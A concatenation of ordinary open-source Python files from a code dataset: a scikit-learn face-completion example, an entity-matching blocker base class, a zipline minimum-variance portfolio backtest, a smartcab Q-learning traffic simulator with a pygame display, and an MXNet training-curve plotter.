= \int_{-\infty}^\infty
\frac{1}{\beta_l} e^{-(\frac{x-\mu_l}{\beta_l}
+e^{-\frac{x-\mu_l}{\beta_l}})}
\big( 1 - e^{-e^\frac{x-\mu_r}{\beta_r}} \big) dx
"""
| lgpl-3.0 |
fabianp/scikit-learn | examples/plot_multioutput_face_completion.py | 330 | 3019 | """
==============================================
Face completion with a multi-output estimators
==============================================
This example shows the use of multi-output estimator to complete images.
The goal is to predict the lower half of a face given its upper half.
The first column of images shows true faces. The next columns illustrate
how extremely randomized trees, k nearest neighbors, linear
regression and ridge regression complete the lower half of those faces.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_olivetti_faces
from sklearn.utils.validation import check_random_state
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import RidgeCV
# Load the faces datasets
data = fetch_olivetti_faces()
targets = data.target
data = data.images.reshape((len(data.images), -1))
train = data[targets < 30]
test = data[targets >= 30] # Test on independent people
# Test on a subset of people
n_faces = 5
rng = check_random_state(4)
face_ids = rng.randint(test.shape[0], size=(n_faces, ))
test = test[face_ids, :]
n_pixels = data.shape[1]
X_train = train[:, :np.ceil(0.5 * n_pixels)] # Upper half of the faces
y_train = train[:, np.floor(0.5 * n_pixels):] # Lower half of the faces
X_test = test[:, :np.ceil(0.5 * n_pixels)]
y_test = test[:, np.floor(0.5 * n_pixels):]
# Fit estimators
ESTIMATORS = {
"Extra trees": ExtraTreesRegressor(n_estimators=10, max_features=32,
random_state=0),
"K-nn": KNeighborsRegressor(),
"Linear regression": LinearRegression(),
"Ridge": RidgeCV(),
}
y_test_predict = dict()
for name, estimator in ESTIMATORS.items():
estimator.fit(X_train, y_train)
y_test_predict[name] = estimator.predict(X_test)
# Plot the completed faces
image_shape = (64, 64)
n_cols = 1 + len(ESTIMATORS)
plt.figure(figsize=(2. * n_cols, 2.26 * n_faces))
plt.suptitle("Face completion with multi-output estimators", size=16)
for i in range(n_faces):
true_face = np.hstack((X_test[i], y_test[i]))
if i:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 1)
else:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 1,
title="true faces")
sub.axis("off")
sub.imshow(true_face.reshape(image_shape),
cmap=plt.cm.gray,
interpolation="nearest")
for j, est in enumerate(sorted(ESTIMATORS)):
completed_face = np.hstack((X_test[i], y_test_predict[est][i]))
if i:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j)
else:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j,
title=est)
sub.axis("off")
sub.imshow(completed_face.reshape(image_shape),
cmap=plt.cm.gray,
interpolation="nearest")
plt.show()
| bsd-3-clause |
anhaidgroup/py_entitymatching | py_entitymatching/blocker/blocker.py | 1 | 4527 | import logging
import math
import pandas as pd
import six
import multiprocessing
from py_entitymatching.utils.validation_helper import validate_object_type
logger = logging.getLogger(__name__)
class Blocker(object):
"""Blocker base class.
"""
def validate_types_params_tables(self, ltable, rtable,
l_output_attrs, r_output_attrs, l_output_prefix,
r_output_prefix, verbose, n_jobs):
validate_object_type(ltable, pd.DataFrame, error_prefix='Input left table')
validate_object_type(rtable, pd.DataFrame, error_prefix='Input right table')
if l_output_attrs:
validate_object_type(l_output_attrs, list, 'Output attributes of left table')
for x in l_output_attrs:
validate_object_type(x, six.string_types, 'An output attribute name of left table')
if r_output_attrs:
validate_object_type(r_output_attrs, list, 'Output attributes of right table')
for x in r_output_attrs:
validate_object_type(x, six.string_types, 'An output attribute name of right table')
validate_object_type(l_output_prefix, six.string_types, 'Output prefix of left table')
validate_object_type(r_output_prefix, six.string_types, 'Output prefix of right table')
validate_object_type(verbose, bool, 'Parameter verbose')
validate_object_type(n_jobs, int, 'Parameter n_jobs')
def validate_show_progress(self, show_progress):
validate_object_type(show_progress, bool, 'Parameter show_progress')
def validate_allow_missing(self, allow_missing):
validate_object_type(allow_missing, bool, 'Parameter allow_missing')
def validate_types_params_candset(self, candset, verbose, show_progress, n_jobs):
validate_object_type(candset, pd.DataFrame, 'Input candset')
validate_object_type(verbose, bool, 'Parameter verbose')
validate_object_type(show_progress, bool, 'Parameter show_progress')
validate_object_type(n_jobs, int, 'Parameter n_jobs')
def validate_output_attrs(self, ltable, rtable, l_output_attrs, r_output_attrs):
if l_output_attrs:
if not isinstance(l_output_attrs, list):
l_output_attrs = [l_output_attrs]
assert set(l_output_attrs).issubset(ltable.columns) == True, 'Left output attributes are not in the left ' \
'table'
if r_output_attrs:
if not isinstance(r_output_attrs, list):
r_output_attrs = [r_output_attrs]
assert set(r_output_attrs).issubset(rtable.columns) == True, 'Right output attributes are not in the right' \
' table'
def get_attrs_to_retain(self, l_key, r_key, l_output_attrs, r_output_attrs, l_output_prefix, r_output_prefix):
ret_cols = [l_output_prefix + l_key, r_output_prefix + r_key]
if l_output_attrs:
ret_cols.extend(l_output_prefix + c for c in l_output_attrs if l_output_prefix + c not in ret_cols)
if r_output_attrs:
ret_cols.extend(r_output_prefix + c for c in r_output_attrs if r_output_prefix + c not in ret_cols)
return ret_cols
def get_attrs_to_project(self, key, block_attr, output_attrs):
proj_attrs = []
if output_attrs is not None:
proj_attrs.extend(output_attrs)
if key not in proj_attrs:
proj_attrs.append(key)
if block_attr not in proj_attrs:
proj_attrs.append(block_attr)
return proj_attrs
def get_split_params(self, n_procs, min_m, min_n):
m = int(math.sqrt(n_procs))
while n_procs % m != 0:
m = m - 1
n = int(n_procs / m)
# to safeguard against small tables, do not split less than min values
return min(m, min_m), min(n, min_n)
def get_num_procs(self, n_jobs, min_procs):
# determine number of processes to launch parallely
n_cpus = multiprocessing.cpu_count()
n_procs = n_jobs
if n_jobs < 0:
n_procs = n_cpus + 1 + n_jobs
# cannot launch less than min_procs to safeguard against small tables
return min(n_procs, min_procs)
| bsd-3-clause |
returnandrisk/meucci-python | dynamic_allocation_performance_analysis.py | 1 | 7540 | """
Python code for blog post "mini-Meucci : Applying The Checklist - Steps 10+"
http://www.returnandrisk.com/2016/07/mini-meucci-applying-checklist-steps-10.html
Copyright (c) 2016 Peter Chan (peter-at-return-and-risk-dot-com)
"""
###############################################################################
# Dynamic Allocation
###############################################################################
#%matplotlib inline
import rnr_meucci_functions as rnr
import numpy as np
from zipline.api import (set_slippage, slippage, set_commission, commission,
order_target_percent, record, schedule_function,
date_rules, time_rules, get_datetime, symbol)
# Set tickers for data loading i.e. DJIA constituents and DIA ETF for benchmark
tickers = ['MMM','AXP','AAPL','BA','CAT','CVX','CSCO','KO','DD','XOM','GE','GS',
'HD','INTC','IBM','JNJ','JPM','MCD','MRK','MSFT','NKE','PFE','PG',
'TRV','UNH','UTX','VZ','V','WMT','DIS', 'DIA']
# Set investable asset tickers
asset_tickers = ['MMM','AXP','AAPL','BA','CAT','CVX','CSCO','KO','DD','XOM','GE','GS',
'HD','INTC','IBM','JNJ','JPM','MCD','MRK','MSFT','NKE','PFE','PG',
'TRV','UNH','UTX','VZ','V','WMT','DIS']
def initialize(context):
# Turn off the slippage model
set_slippage(slippage.FixedSlippage(spread=0.0))
# Set the commission model
set_commission(commission.PerShare(cost=0.01, min_trade_cost=1.0))
context.day = -1 # using zero-based counter for days
context.set_benchmark(symbol('DIA'))
context.assets = []
print('Setup investable assets...')
for ticker in asset_tickers:
#print(ticker)
context.assets.append(symbol(ticker))
context.n_asset = len(context.assets)
context.n_portfolio = 40 # num mean-variance efficient portfolios to compute
context.today = None
context.tau = None
context.min_data_window = 756 # min of 3 yrs data for calculations
context.first_rebal_date = None
context.first_rebal_idx = None
context.weights = None
# Schedule dynamic allocation calcs to occur 1 day before month end - note that
# actual trading will occur on the close on the last trading day of the month
schedule_function(rebalance,
date_rule=date_rules.month_end(days_offset=1),
time_rule=time_rules.market_close())
# Record some stuff every day
schedule_function(record_vars,
date_rule=date_rules.every_day(),
time_rule=time_rules.market_close())
def handle_data(context, data):
context.day += 1
#print(context.day)
def rebalance(context, data):
# Wait for 756 trading days (3 yrs) of historical prices before trading
if context.day < context.min_data_window - 1:
return
# Get expanding window of past prices and compute returns
context.today = get_datetime().date()
prices = data.history(context.assets, "price", context.day, "1d")
if context.first_rebal_date is None:
context.first_rebal_date = context.today
context.first_rebal_idx = context.day
print('Starting dynamic allocation simulation...')
# Get investment horizon in days ie number of trading days next month
context.tau = rnr.get_num_days_nxt_month(context.today.month, context.today.year)
# Calculate HFP distribution
asset_rets = np.array(prices.pct_change(context.tau).iloc[context.tau:, :])
num_scenarios = len(asset_rets)
# Set Flexible Probabilities Using Exponential Smoothing
half_life_prjn = 252 * 2 # in days
lambda_prjn = np.log(2) / half_life_prjn
probs_prjn = np.exp(-lambda_prjn * (np.arange(0, num_scenarios)[::-1]))
probs_prjn = probs_prjn / sum(probs_prjn)
mu_pc, sigma2_pc = rnr.fp_mean_cov(asset_rets.T, probs_prjn)
# Perform shrinkage to mitigate estimation risk
mu_shrk, sigma2_shrk = rnr.simple_shrinkage(mu_pc, sigma2_pc)
weights, _, _ = rnr.efficient_frontier_qp_rets(context.n_portfolio,
sigma2_shrk, mu_shrk)
print('Optimal weights calculated 1 day before month end on %s (day=%s)' \
% (context.today, context.day))
#print(weights)
min_var_weights = weights[0,:]
# Rebalance portfolio accordingly
for stock, weight in zip(prices.columns, min_var_weights):
order_target_percent(stock, np.asscalar(weight))
context.weights = min_var_weights
def record_vars(context, data):
record(weights=context.weights, tau=context.tau)
def analyze(perf, bm_value, start_idx):
pd.DataFrame({'portfolio':results.portfolio_value,'benchmark':bm_value})\
.iloc[start_idx:,:].plot(title='Portfolio Performance vs Benchmark')
if __name__ == '__main__':
from datetime import datetime
import pytz
from zipline.algorithm import TradingAlgorithm
from zipline.utils.factory import load_bars_from_yahoo
import pandas as pd
import matplotlib.pyplot as plt
# Create and run the algorithm.
algo = TradingAlgorithm(initialize=initialize, handle_data=handle_data)
start = datetime(2010, 5, 1, 0, 0, 0, 0, pytz.utc)
end = datetime(2016, 5, 31, 0, 0, 0, 0, pytz.utc)
print('Getting Yahoo data for 30 DJIA stocks and DIA ETF as benchmark...')
data = load_bars_from_yahoo(stocks=tickers, start=start, end=end)
# Check price data
data.loc[:, :, 'price'].plot(figsize=(8,7), title='Input Price Data')
plt.ylabel('price in $');
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5))
plt.show()
# Run algorithm
results = algo.run(data)
# Fix possible issue with timezone
results.index = results.index.normalize()
if results.index.tzinfo is None:
results.index = results.index.tz_localize('UTC')
# Adjust benchmark returns for delayed trading due to 3 year min data window
bm_rets = algo.perf_tracker.all_benchmark_returns
bm_rets[0:algo.first_rebal_idx + 2] = 0
bm_rets.name = 'DIA'
bm_rets.index.freq = None
bm_value = algo.capital_base * np.cumprod(1+bm_rets)
# Plot portfolio and benchmark values
analyze(results, bm_value, algo.first_rebal_idx + 1)
print('End value portfolio = {:.0f}'.format(results.portfolio_value.ix[-1]))
print('End value benchmark = {:.0f}'.format(bm_value[-1]))
# Plot end weights
pd.DataFrame(results.weights.ix[-1], index=asset_tickers, columns=['w'])\
.sort_values('w', ascending=False).plot(kind='bar', \
title='End Simulation Weights', legend=None);
###############################################################################
# Sequel Step - Ex-post performance analysis
###############################################################################
import pyfolio as pf
returns, positions, transactions, gross_lev = pf.utils.\
extract_rets_pos_txn_from_zipline(results)
trade_start = results.index[algo.first_rebal_idx + 1]
trade_end = datetime(2016, 5, 31, 0, 0, 0, 0, pytz.utc)
print('Annualised volatility of the portfolio = {:.4}'.\
format(pf.timeseries.annual_volatility(returns[trade_start:trade_end])))
print('Annualised volatility of the benchmark = {:.4}'.\
format(pf.timeseries.annual_volatility(bm_rets[trade_start:trade_end])))
print('')
pf.create_returns_tear_sheet(returns[trade_start:trade_end],
benchmark_rets=bm_rets[trade_start:trade_end],
return_fig=False)
| mit |
aattaran/Machine-Learning-with-Python | smartcab - Copy/smartcab/simulator.py | 11 | 25158 | ###########################################
# Suppress matplotlib user warnings
# Necessary for newer version of matplotlib
import warnings
warnings.filterwarnings("ignore", category = UserWarning, module = "matplotlib")
###########################################
import os
import time
import random
import importlib
import csv
class Simulator(object):
"""Simulates agents in a dynamic smartcab environment.
Uses PyGame to display GUI, if available.
"""
colors = {
'black' : ( 0, 0, 0),
'white' : (255, 255, 255),
'red' : (255, 0, 0),
'green' : ( 0, 255, 0),
'dgreen' : ( 0, 228, 0),
'blue' : ( 0, 0, 255),
'cyan' : ( 0, 200, 200),
'magenta' : (200, 0, 200),
'yellow' : (255, 255, 0),
'mustard' : (200, 200, 0),
'orange' : (255, 128, 0),
'maroon' : (200, 0, 0),
'crimson' : (128, 0, 0),
'gray' : (155, 155, 155)
}
def __init__(self, env, size=None, update_delay=2.0, display=True, log_metrics=False, optimized=False):
self.env = env
self.size = size if size is not None else ((self.env.grid_size[0] + 1) * self.env.block_size, (self.env.grid_size[1] + 2) * self.env.block_size)
self.width, self.height = self.size
self.road_width = 44
self.bg_color = self.colors['gray']
self.road_color = self.colors['black']
self.line_color = self.colors['mustard']
self.boundary = self.colors['black']
self.stop_color = self.colors['crimson']
self.quit = False
self.start_time = None
self.current_time = 0.0
self.last_updated = 0.0
self.update_delay = update_delay # duration between each step (in seconds)
self.display = display
if self.display:
try:
self.pygame = importlib.import_module('pygame')
self.pygame.init()
self.screen = self.pygame.display.set_mode(self.size)
self._logo = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "logo.png")), (self.road_width, self.road_width))
self._ew = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "east-west.png")), (self.road_width, self.road_width))
self._ns = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "north-south.png")), (self.road_width, self.road_width))
self.frame_delay = max(1, int(self.update_delay * 1000)) # delay between GUI frames in ms (min: 1)
self.agent_sprite_size = (32, 32)
self.primary_agent_sprite_size = (42, 42)
self.agent_circle_radius = 20 # radius of circle, when using simple representation
for agent in self.env.agent_states:
if agent.color == 'white':
agent._sprite = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "car-{}.png".format(agent.color))), self.primary_agent_sprite_size)
else:
agent._sprite = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "car-{}.png".format(agent.color))), self.agent_sprite_size)
agent._sprite_size = (agent._sprite.get_width(), agent._sprite.get_height())
self.font = self.pygame.font.Font(None, 20)
self.paused = False
except ImportError as e:
self.display = False
print "Simulator.__init__(): Unable to import pygame; display disabled.\n{}: {}".format(e.__class__.__name__, e)
except Exception as e:
self.display = False
print "Simulator.__init__(): Error initializing GUI objects; display disabled.\n{}: {}".format(e.__class__.__name__, e)
# Setup metrics to report
self.log_metrics = log_metrics
self.optimized = optimized
if self.log_metrics:
a = self.env.primary_agent
# Set log files
if a.learning:
if self.optimized: # Whether the user is optimizing the parameters and decay functions
self.log_filename = os.path.join("logs", "sim_improved-learning.csv")
self.table_filename = os.path.join("logs","sim_improved-learning.txt")
else:
self.log_filename = os.path.join("logs", "sim_default-learning.csv")
self.table_filename = os.path.join("logs","sim_default-learning.txt")
self.table_file = open(self.table_filename, 'wb')
else:
self.log_filename = os.path.join("logs", "sim_no-learning.csv")
self.log_fields = ['trial', 'testing', 'parameters', 'initial_deadline', 'final_deadline', 'net_reward', 'actions', 'success']
self.log_file = open(self.log_filename, 'wb')
self.log_writer = csv.DictWriter(self.log_file, fieldnames=self.log_fields)
self.log_writer.writeheader()
def run(self, tolerance=0.05, n_test=0):
""" Run a simulation of the environment.
'tolerance' is the minimum epsilon necessary to begin testing (if enabled)
'n_test' is the number of testing trials simulated
Note that the minimum number of training trials is always 20. """
self.quit = False
# Get the primary agent
a = self.env.primary_agent
total_trials = 1
testing = False
trial = 1
while True:
# Flip testing switch
if not testing:
if total_trials > 20: # Must complete minimum 20 training trials
if a.learning:
if a.epsilon < tolerance: # assumes epsilon decays to 0
testing = True
trial = 1
else:
testing = True
trial = 1
# Break if we've reached the limit of testing trials
else:
if trial > n_test:
break
# Pretty print to terminal
print
print "/-------------------------"
if testing:
print "| Testing trial {}".format(trial)
else:
print "| Training trial {}".format(trial)
print "\-------------------------"
print
self.env.reset(testing)
self.current_time = 0.0
self.last_updated = 0.0
self.start_time = time.time()
while True:
try:
# Update current time
self.current_time = time.time() - self.start_time
# Handle GUI events
if self.display:
for event in self.pygame.event.get():
if event.type == self.pygame.QUIT:
self.quit = True
elif event.type == self.pygame.KEYDOWN:
if event.key == 27: # Esc
self.quit = True
elif event.unicode == u' ':
self.paused = True
if self.paused:
self.pause()
# Update environment
if self.current_time - self.last_updated >= self.update_delay:
self.env.step()
self.last_updated = self.current_time
# Render text
self.render_text(trial, testing)
# Render GUI and sleep
if self.display:
self.render(trial, testing)
self.pygame.time.wait(self.frame_delay)
except KeyboardInterrupt:
self.quit = True
finally:
if self.quit or self.env.done:
break
if self.quit:
break
# Collect metrics from trial
if self.log_metrics:
self.log_writer.writerow({
'trial': trial,
'testing': self.env.trial_data['testing'],
'parameters': self.env.trial_data['parameters'],
'initial_deadline': self.env.trial_data['initial_deadline'],
'final_deadline': self.env.trial_data['final_deadline'],
'net_reward': self.env.trial_data['net_reward'],
'actions': self.env.trial_data['actions'],
'success': self.env.trial_data['success']
})
# Trial finished
if self.env.success == True:
print "\nTrial Completed!"
print "Agent reached the destination."
else:
print "\nTrial Aborted!"
print "Agent did not reach the destination."
# Increment
total_trials = total_trials + 1
trial = trial + 1
# Clean up
if self.log_metrics:
if a.learning:
f = self.table_file
f.write("/-----------------------------------------\n")
f.write("| State-action rewards from Q-Learning\n")
f.write("\-----------------------------------------\n\n")
for state in a.Q:
f.write("{}\n".format(state))
for action, reward in a.Q[state].iteritems():
f.write(" -- {} : {:.2f}\n".format(action, reward))
f.write("\n")
self.table_file.close()
self.log_file.close()
print "\nSimulation ended. . . "
# Report final metrics
if self.display:
self.pygame.display.quit() # shut down pygame
def render_text(self, trial, testing=False):
""" This is the non-GUI render display of the simulation.
Simulated trial data will be rendered in the terminal/command prompt. """
status = self.env.step_data
if status and status['waypoint'] is not None: # Continuing the trial
# Previous State
if status['state']:
print "Agent previous state: {}".format(status['state'])
else:
print "!! Agent state not been updated!"
# Result
if status['violation'] == 0: # Legal
if status['waypoint'] == status['action']: # Followed waypoint
print "Agent followed the waypoint {}. (rewarded {:.2f})".format(status['action'], status['reward'])
elif status['action'] == None:
if status['light'] == 'red': # Stuck at red light
print "Agent properly idled at a red light. (rewarded {:.2f})".format(status['reward'])
else:
print "Agent idled at a green light with oncoming traffic. (rewarded {:.2f})".format(status['reward'])
else: # Did not follow waypoint
print "Agent drove {} instead of {}. (rewarded {:.2f})".format(status['action'], status['waypoint'], status['reward'])
else: # Illegal
if status['violation'] == 1: # Minor violation
print "Agent idled at a green light with no oncoming traffic. (rewarded {:.2f})".format(status['reward'])
elif status['violation'] == 2: # Major violation
print "Agent attempted driving {} through a red light. (rewarded {:.2f})".format(status['action'], status['reward'])
elif status['violation'] == 3: # Minor accident
print "Agent attempted driving {} through traffic and cause a minor accident. (rewarded {:.2f})".format(status['action'], status['reward'])
elif status['violation'] == 4: # Major accident
print "Agent attempted driving {} through a red light with traffic and cause a major accident. (rewarded {:.2f})".format(status['action'], status['reward'])
# Time Remaining
if self.env.enforce_deadline:
time = (status['deadline'] - 1) * 100.0 / (status['t'] + status['deadline'])
print "{:.0f}% of time remaining to reach destination.".format(time)
else:
print "Agent not enforced to meet deadline."
# Starting new trial
else:
a = self.env.primary_agent
print "Simulating trial. . . "
if a.learning:
print "epsilon = {:.4f}; alpha = {:.4f}".format(a.epsilon, a.alpha)
else:
print "Agent not set to learn."
def render(self, trial, testing=False):
""" This is the GUI render display of the simulation.
Supplementary trial data can be found from render_text. """
# Reset the screen.
self.screen.fill(self.bg_color)
# Draw elements
# * Static elements
# Boundary
self.pygame.draw.rect(self.screen, self.boundary, ((self.env.bounds[0] - self.env.hang)*self.env.block_size, (self.env.bounds[1]-self.env.hang)*self.env.block_size, (self.env.bounds[2] + self.env.hang/3)*self.env.block_size, (self.env.bounds[3] - 1 + self.env.hang/3)*self.env.block_size), 4)
for road in self.env.roads:
# Road
self.pygame.draw.line(self.screen, self.road_color, (road[0][0] * self.env.block_size, road[0][1] * self.env.block_size), (road[1][0] * self.env.block_size, road[1][1] * self.env.block_size), self.road_width)
# Center line
self.pygame.draw.line(self.screen, self.line_color, (road[0][0] * self.env.block_size, road[0][1] * self.env.block_size), (road[1][0] * self.env.block_size, road[1][1] * self.env.block_size), 2)
for intersection, traffic_light in self.env.intersections.iteritems():
self.pygame.draw.circle(self.screen, self.road_color, (intersection[0] * self.env.block_size, intersection[1] * self.env.block_size), self.road_width/2)
if traffic_light.state: # North-South is open
self.screen.blit(self._ns,
self.pygame.rect.Rect(intersection[0]*self.env.block_size - self.road_width/2, intersection[1]*self.env.block_size - self.road_width/2, intersection[0]*self.env.block_size + self.road_width, intersection[1]*self.env.block_size + self.road_width/2))
self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size - self.road_width/2), (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size + self.road_width/2), 2)
self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size + self.road_width/2 + 1, intersection[1] * self.env.block_size - self.road_width/2), (intersection[0] * self.env.block_size + self.road_width/2 + 1, intersection[1] * self.env.block_size + self.road_width/2), 2)
else:
self.screen.blit(self._ew,
self.pygame.rect.Rect(intersection[0]*self.env.block_size - self.road_width/2, intersection[1]*self.env.block_size - self.road_width/2, intersection[0]*self.env.block_size + self.road_width, intersection[1]*self.env.block_size + self.road_width/2))
self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size - self.road_width/2), (intersection[0] * self.env.block_size + self.road_width/2, intersection[1] * self.env.block_size - self.road_width/2), 2)
self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size + self.road_width/2, intersection[1] * self.env.block_size + self.road_width/2 + 1), (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size + self.road_width/2 + 1), 2)
# * Dynamic elements
self.font = self.pygame.font.Font(None, 20)
for agent, state in self.env.agent_states.iteritems():
# Compute precise agent location here (back from the intersection some)
agent_offset = (2 * state['heading'][0] * self.agent_circle_radius + self.agent_circle_radius * state['heading'][1] * 0.5, \
2 * state['heading'][1] * self.agent_circle_radius - self.agent_circle_radius * state['heading'][0] * 0.5)
agent_pos = (state['location'][0] * self.env.block_size - agent_offset[0], state['location'][1] * self.env.block_size - agent_offset[1])
agent_color = self.colors[agent.color]
if hasattr(agent, '_sprite') and agent._sprite is not None:
# Draw agent sprite (image), properly rotated
rotated_sprite = agent._sprite if state['heading'] == (1, 0) else self.pygame.transform.rotate(agent._sprite, 180 if state['heading'][0] == -1 else state['heading'][1] * -90)
self.screen.blit(rotated_sprite,
self.pygame.rect.Rect(agent_pos[0] - agent._sprite_size[0] / 2, agent_pos[1] - agent._sprite_size[1] / 2,
agent._sprite_size[0], agent._sprite_size[1]))
else:
# Draw simple agent (circle with a short line segment poking out to indicate heading)
self.pygame.draw.circle(self.screen, agent_color, agent_pos, self.agent_circle_radius)
self.pygame.draw.line(self.screen, agent_color, agent_pos, state['location'], self.road_width)
if state['destination'] is not None:
self.screen.blit(self._logo,
self.pygame.rect.Rect(state['destination'][0] * self.env.block_size - self.road_width/2, \
state['destination'][1]*self.env.block_size - self.road_width/2, \
state['destination'][0]*self.env.block_size + self.road_width/2, \
state['destination'][1]*self.env.block_size + self.road_width/2))
# * Overlays
self.font = self.pygame.font.Font(None, 50)
if testing:
self.screen.blit(self.font.render("Testing Trial %s"%(trial), True, self.colors['black'], self.bg_color), (10, 10))
else:
self.screen.blit(self.font.render("Training Trial %s"%(trial), True, self.colors['black'], self.bg_color), (10, 10))
self.font = self.pygame.font.Font(None, 30)
# Status text about each step
status = self.env.step_data
if status:
# Previous State
if status['state']:
self.screen.blit(self.font.render("Previous State: {}".format(status['state']), True, self.colors['white'], self.bg_color), (350, 10))
if not status['state']:
self.screen.blit(self.font.render("!! Agent state not updated!", True, self.colors['maroon'], self.bg_color), (350, 10))
# Action
if status['violation'] == 0: # Legal
if status['action'] == None:
self.screen.blit(self.font.render("No action taken. (rewarded {:.2f})".format(status['reward']), True, self.colors['dgreen'], self.bg_color), (350, 40))
else:
self.screen.blit(self.font.render("Agent drove {}. (rewarded {:.2f})".format(status['action'], status['reward']), True, self.colors['dgreen'], self.bg_color), (350, 40))
else: # Illegal
if status['action'] == None:
self.screen.blit(self.font.render("No action taken. (rewarded {:.2f})".format(status['reward']), True, self.colors['maroon'], self.bg_color), (350, 40))
else:
self.screen.blit(self.font.render("{} attempted (rewarded {:.2f})".format(status['action'], status['reward']), True, self.colors['maroon'], self.bg_color), (350, 40))
# Result
if status['violation'] == 0: # Legal
if status['waypoint'] == status['action']: # Followed waypoint
self.screen.blit(self.font.render("Agent followed the waypoint!", True, self.colors['dgreen'], self.bg_color), (350, 70))
elif status['action'] == None:
if status['light'] == 'red': # Stuck at a red light
self.screen.blit(self.font.render("Agent idled at a red light!", True, self.colors['dgreen'], self.bg_color), (350, 70))
else:
self.screen.blit(self.font.render("Agent idled at a green light with oncoming traffic.", True, self.colors['mustard'], self.bg_color), (350, 70))
else: # Did not follow waypoint
self.screen.blit(self.font.render("Agent did not follow the waypoint.", True, self.colors['mustard'], self.bg_color), (350, 70))
else: # Illegal
if status['violation'] == 1: # Minor violation
self.screen.blit(self.font.render("There was a green light with no oncoming traffic.", True, self.colors['maroon'], self.bg_color), (350, 70))
elif status['violation'] == 2: # Major violation
self.screen.blit(self.font.render("There was a red light with no traffic.", True, self.colors['maroon'], self.bg_color), (350, 70))
elif status['violation'] == 3: # Minor accident
self.screen.blit(self.font.render("There was traffic with right-of-way.", True, self.colors['maroon'], self.bg_color), (350, 70))
elif status['violation'] == 4: # Major accident
self.screen.blit(self.font.render("There was a red light with traffic.", True, self.colors['maroon'], self.bg_color), (350, 70))
# Time Remaining
if self.env.enforce_deadline:
time = (status['deadline'] - 1) * 100.0 / (status['t'] + status['deadline'])
self.screen.blit(self.font.render("{:.0f}% of time remaining to reach destination.".format(time), True, self.colors['black'], self.bg_color), (350, 100))
else:
self.screen.blit(self.font.render("Agent not enforced to meet deadline.", True, self.colors['black'], self.bg_color), (350, 100))
# Denote whether a trial was a success or failure
if (state['destination'] != state['location'] and state['deadline'] > 0) or (self.env.enforce_deadline is not True and state['destination'] != state['location']):
self.font = self.pygame.font.Font(None, 40)
if self.env.success == True:
self.screen.blit(self.font.render("Previous Trial: Success", True, self.colors['dgreen'], self.bg_color), (10, 50))
if self.env.success == False:
self.screen.blit(self.font.render("Previous Trial: Failure", True, self.colors['maroon'], self.bg_color), (10, 50))
if self.env.primary_agent.learning:
self.font = self.pygame.font.Font(None, 22)
self.screen.blit(self.font.render("epsilon = {:.4f}".format(self.env.primary_agent.epsilon), True, self.colors['black'], self.bg_color), (10, 80))
self.screen.blit(self.font.render("alpha = {:.4f}".format(self.env.primary_agent.alpha), True, self.colors['black'], self.bg_color), (10, 95))
# Reset status text
else:
self.pygame.rect.Rect(350, 10, self.width, 200)
self.font = self.pygame.font.Font(None, 40)
self.screen.blit(self.font.render("Simulating trial. . .", True, self.colors['white'], self.bg_color), (400, 60))
# Flip buffers
self.pygame.display.flip()
def pause(self):
""" When the GUI is enabled, this function will pause the simulation. """
abs_pause_time = time.time()
self.font = self.pygame.font.Font(None, 30)
pause_text = "Simulation Paused. Press any key to continue. . ."
self.screen.blit(self.font.render(pause_text, True, self.colors['red'], self.bg_color), (400, self.height - 30))
self.pygame.display.flip()
print pause_text
while self.paused:
for event in self.pygame.event.get():
if event.type == self.pygame.KEYDOWN:
self.paused = False
self.pygame.time.wait(self.frame_delay)
self.screen.blit(self.font.render(pause_text, True, self.bg_color, self.bg_color), (400, self.height - 30))
self.start_time += (time.time() - abs_pause_time)
| bsd-3-clause |
jennyzhang0215/incubator-mxnet | example/kaggle-ndsb1/training_curves.py | 52 | 1879 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
## based on https://github.com/dmlc/mxnet/issues/1302
## Parses the model fit log file and generates a train/val vs epoch plot
import matplotlib.pyplot as plt
import numpy as np
import re
import argparse
parser = argparse.ArgumentParser(description='Parses log file and generates train/val curves')
parser.add_argument('--log-file', type=str,default="log_tr_va",
help='the path of log file')
args = parser.parse_args()
TR_RE = re.compile('.*?]\sTrain-accuracy=([\d\.]+)')
VA_RE = re.compile('.*?]\sValidation-accuracy=([\d\.]+)')
log = open(args.log_file).read()
log_tr = [float(x) for x in TR_RE.findall(log)]
log_va = [float(x) for x in VA_RE.findall(log)]
idx = np.arange(len(log_tr))
plt.figure(figsize=(8, 6))
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.plot(idx, log_tr, 'o', linestyle='-', color="r",
label="Train accuracy")
plt.plot(idx, log_va, 'o', linestyle='-', color="b",
label="Validation accuracy")
plt.legend(loc="best")
plt.xticks(np.arange(min(idx), max(idx)+1, 5))
plt.yticks(np.arange(0, 1, 0.2))
plt.ylim([0,1])
plt.show()
